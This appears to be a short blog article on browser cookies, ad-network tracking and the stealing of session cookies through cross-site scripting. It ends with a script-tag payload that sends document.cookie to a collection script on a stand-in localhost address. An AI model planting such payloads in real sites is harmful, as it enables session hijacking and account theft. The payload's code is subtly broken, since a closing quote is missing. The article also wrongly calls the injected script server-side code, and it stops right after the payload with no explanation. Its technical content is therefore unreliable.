This article discusses how cookies move around the web and how they can be stolen.
A cookie is a randomly generated alphanumeric string that is generated when you visit a webpage and is sent to your browser by that webpage to be kept as a record of your presence on that website so that you can be recognized by that site when you visit it again because of your previous session(known as a session ID).
But that’s not the only purpose of cookies they are also extensively used to keep a track of your preferences online and they travel from one server to another and can be intercepted and stolen quite easily. This article discusses how cookies move around the web and how they can be stolen.
The Cookie Trail
These ads are not part of that website but are being supplied from different servers around the world to the website in exchange for money. Whenever we click one of these ads, it sends back a cookie to its respective server, and the server stores it to keep a track of our preferences.
The servers also communicate with each other and they form an advertising network, sharing your preferences and showing you ads according to those preferences in the future. So you are being tracked and watched by multiple entities online all the time unknowingly.
The Cookie Law is a piece of privacy legislation that requires websites to get consent from visitors to store or retrieve any information on a computer, smartphone, or tablet. It was designed to protect online privacy, by making consumers aware of how information about them is collected and used online, and giving them a choice to allow it or not.
Shopping preferences might not classify as sensitive information about an individual but online shopping carts and banking details are really sensitive data and all of this is also remembered by a site with the help of session cookies.
If an attacker manages to get a hold of your session cookies then that person will be able to pose as you and that site and will have access to your banking details and your amazon shopping cart and might order stuff from your amazon account to his/her address spending all your money.
This generally happens when the site has a vulnerability and the attacker uses something known as cross-site scripting (XSS) to exploit that vulnerability.
This is found mostly in badly-coded websites where the developer forgets to include certain security measures to prevent an attacker from running a cross-site script.
How do websites use XSS to steal cookies?
I’m going to explain this with a hypothetical scenario. So let’s say we visit one such vulnerable site which has a comments section on it.
Now on an ideal, secure website, a comment section should only have text in plain English but on an insecure site, if we post a code in the comment section the site would think that it is some code from the server-side and it is supposed to run that code.
<script> document.write('<img src="http://localhost/submitcookie.php? cookie ='+ escape(document.cookie) + '" />); </script>
Thank you for reading my article
And if you like it give me a follow.